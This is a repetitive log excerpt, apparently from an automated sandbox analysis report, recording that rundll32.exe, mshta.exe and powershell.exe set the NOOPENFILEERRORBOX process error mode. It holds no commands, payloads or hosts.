          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
